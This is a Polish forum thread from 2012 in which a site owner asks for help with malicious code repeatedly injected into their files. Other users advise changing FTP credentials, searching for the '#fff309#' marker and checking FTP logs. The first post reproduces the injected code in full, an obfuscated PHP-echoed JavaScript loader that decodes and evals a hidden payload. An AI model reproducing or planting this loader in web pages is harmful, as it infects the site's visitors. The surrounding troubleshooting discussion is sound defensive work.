Doklejany kod

[kcp 41]

Witam!

 

Mam problem co jakiś czas do plików dokleja mi następujący kod:

 

<? #fff309# echo "  <script type=\"text/javascript\" language=\"javascript\" >																																																																																																				try{if(window.document)window[\"document\"][\"body\"]=\"vasasf\"}catch(bawetawe){if(window.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if(020===0x10)v[\"document\"][\"bo\"+\"dy\"]=\"123\"}catch(gfdnfdgber){m=123;if((alert+\"\").indexOf(\"n\"+\"a\"+\"ti\"+\"ve\")!==-1)ev=window[\"eval\"];}}n=[\"1f\",\"42\",\"4h\",\"4a\",\"3o\",\"4g\",\"45\",\"4b\",\"4a\",\"17\",\"1f\",\"1g\",\"17\",\"4n\",\"d\",\"a\",\"17\",\"17\",\"17\",\"17\",\"4i\",\"3m\",\"4e\",\"17\",\"4l\",\"3n\",\"42\",\"4f\",\"43\",\"17\",\"2b\",\"17\",\"40\",\"4b\",\"3o\",\"4h\",\"49\",\"41\",\"4a\",\"4g\",\"1l\",\"3o\",\"4e\",\"41\",\"3m\",\"4g\",\"41\",\"2j\",\"48\",\"41\",\"49\",\"41\",\"4a\",\"4g\",\"1f\",\"1e\",\"45\",\"42\",\"4e\",\"3m\",\"49\",\"41\",\"1e\",\"1g\",\"29\",\"d\",\"a\",\"d\",\"a\",\"17\",\"17\",\"17\",\"17\",\"4l\",\"3n\",\"42\",\"4f\",\"43\",\"1l\",\"4f\",\"4e\",\"3o\",\"17\",\"2b\",\"17\",\"1e\",\"44\",\"4g\",\"4g\",\"4c\",\"28\",\"1m\",\"1m\",\"4j\",\"4j\",\"4j\",\"1l\",\"3n\",\"43\",\"4f\",\"4g\",\"3m\",\"47\",\"45\",\"4a\",\"43\",\"1l\",\"3o\",\"4b\",\"49\",\"1m\",\"3k\",\"4i\",\"4g\",\"45\",\"3k\",\"3o\",\"4a\",\"42\",\"1m\",\"4e\",\"41\",\"48\",\"1l\",\"4c\",\"44\",\"4c\",\"1e\",\"29\",\"d\",\"a\",\"17\",\"17\",\"17\",\"17\",\"4l\",\"3n\",\"42\",\"4f\",\"43\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"4c\",\"4b\",\"4f\",\"45\",\"4g\",\"45\",\"4b\",\"4a\",\"17\",\"2b\",\"17\",\"1e\",\"3m\",\"3n\",\"4f\",\"4b\",\"48\",\"4h\",\"4g\",\"41\",\"1e\",\"29\",\"d\",\"a\",\"17\",\"17\",\"17\",\"17\",\"4l\",\"3n\",\"42\",\"4f\",\"43\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"3n\",\"4b\",\"4e\",\"40\",\"41\",\"4e\",\"17\",\"2b\",\"17\",\"1e\",\"1n\",\"1e\",\"29\",\"d\",\"a\",\"17\",\"17\",\"17\",\"17\",\"4l\",\"3n\",\"42\",\"4f\",\"43\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"44\",\"41\",\"45\",\"43\",\"44\",\"4g\",\"17\",\"2b\",\"17\",\"1e\",\"1o\",\"4c\",\"4k\",\"1e\",\"29\",\"d\",\"a\",\"17\",\"17\",\"17\",\"17\",\"4l\",\"3n\",\"42\",\"4f\",\"43\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"4j\",\"45\",\"40\",\"4g\",\"44\",\"17\",\"2b\",\"17\",\"1e\",\"1o\",\"4c\",\"4k\",\"1e\",\"29\",\"d\",\"a\",\"17\",\"17\",\"17\",\"17\",\"4l\",\"3n\",\"42\",\"4f\",\"43\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"48\",\"41\",\"42\",\"4g\",\"17\",\"2b\",\"17\",\"1e\",\"1o\",\"4c\",\"4k\",\"1e\",\"29\",\"d\",\"a\",\"17\",\"17\",\"17\",\"17\",\"4l\",\"3n\",\"42\",\"4f\",\"43\",\"1l\",\"4f\",\"4g\",\"4l\",\"48\",\"41\",\"1l\",\"4g\",\"4b\",\"4c\",\"17\",\"2b\",\"17\",\"1e\",\"1o\",\"4c\",\"4k\",\"1e\",\"29\",\"d\",\"a\",\"d\",\"a\",\"17\",\"17\",\"17\",\"17\",\"45\",\"42\",\"17\",\"1f\",\"18\",\"40\",\"4b\",\"3o\",\"4h\",\"49\",\"41\",\"4a\",\"4g\",\"1l\",\"43\",\"41\",\"4g\",\"2j\",\"48\",\"41\",\"49\",\"41\",\"4a\",\"4g\",\"2g\",\"4l\",\"2n\",\"40\",\"1f\",\"1e\",\"4l\",\"3n\",\"42\",\"4f\",\"43\",\"1e\",\"1g\",\"1g\",\"17\",\"4n\",\"d\",\"a\",\"17\",\"17\",\"17\",\"17\",\"17\",\"17\",\"17\",\"17\",\"40\",\"4b\",\"3o\",\"4h\",\"49\",\"41\",\"4a\",\"4g\",\"1l\",\"4j\",\"4e\",\"45\",\"4g\",\"41\",\"1f\",\"1e\",\"2a\",\"40\",\"45\",\"4i\",\"17\",\"45\",\"40\",\"2b\",\"3h\",\"1e\",\"4l\",\"3n\",\"42\",\"4f\",\"43\",\"3h\",\"1e\",\"2c\",\"2a\",\"1m\",\"40\",\"45\",\"4i\",\"2c\",\"1e\",\"1g\",\"29\",\"d\",\"a\",\"17\",\"17\",\"17\",\"17\",\"17\",\"17\",\"17\",\"17\",\"40\",\"4b\",\"3o\",\"4h\",\"49\",\"41\",\"4a\",\"4g\",\"1l\",\"43\",\"41\",\"4g\",\"2j\",\"48\",\"41\",\"49\",\"41\",\"4a\",\"4g\",\"2g\",\"4l\",\"2n\",\"40\",\"1f\",\"1e\",\"4l\",\"3n\",\"42\",\"4f\",\"43\",\"1e\",\"1g\",\"1l\",\"3m\",\"4c\",\"4c\",\"41\",\"4a\",\"40\",\"2h\",\"44\",\"45\",\"48\",\"40\",\"1f\",\"4l\",\"3n\",\"42\",\"4f\",\"43\",\"1g\",\"29\",\"d\",\"a\",\"17\",\"17\",\"17\",\"17\",\"50\",\"d\",\"a\",\"50\",\"1g\",\"1f\",\"1g\",\"29\"];h=2;s=\"\";if(m)for(i=0;i-503!=0;i++){k=i;if(window[\"document\"])s+=String.fromCharCode(parseInt(n[i],25));}z=s;if(v)ev(z)}}}</script>";  #/fff309# ?>

 

Komp skanowany i pod ochroną Ashampo Anti-Malware (nic nie wykrył). Serwer przeskanowany chrotkitem i pod ochrona ClamAV. Co lepsze pliki są zmieniane później niż wtedy kiedy wrzucam je na serwer. Używam FileZilli.

Edytowano Listopad 22, 2012 przez kcp (zobacz historię edycji)

[kovalsky 22]

Używam FileZilli.

 

Jeśli zapisujesz w niej hasła to je pozmieniaj. Przeskanuj pliki na serwerze dla "#fff309#" i powywalaj to co sie podoklejało.

 

NIE ZAPISUJ haseł w filezilli, ponieważ są przechowywane w 'plain text'.

[kcp 41]

Jeśli zapisujesz w niej hasła to je pozmieniaj. Przeskanuj pliki na serwerze dla "#fff309#" i powywalaj to co sie podoklejało.

 

NIE ZAPISUJ haseł w filezilli, ponieważ są przechowywane w 'plain text'.

 

 

Dzięki zobaczymy czy coś to pomoże.

[regdos 1848]

Pierwszą rzeczą, która powinieneś zrobić to zmiana hasła na ftp-ie, potem sprawdź logi ftp-a z daty kiedy plik został zmieniony ale nie przez Ciebie i wszystko będziesz wiedział.

[Macsch 122]

NIE ZAPISUJ haseł w filezilli, ponieważ są przechowywane w 'plain text'.

 

Skąd masz taką informację?

[regdos 1848]

Też w to nie wierzyłem ale to sprawdziłem i faktycznie tak jest.

 

Pod W7 c:\Users\xxxxxx\AppData\Roaming\FileZilla\recentservers.xml i tam w pliku hasło sobie jawnie siedzi.

[Macsch 122]

W tym pliku mam tylko

<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
<FileZilla3 />

 

[kcp 41]

OK. Ale powiedzcie jak wywalić ten syf z kompa bo AV nic nie wykrywa.

[Macsch 122]

Kiepski AV, ESET wykrywa Kryptika.

 

http://blog.aw-snap.info/2012/07/malware-removal-vendors.html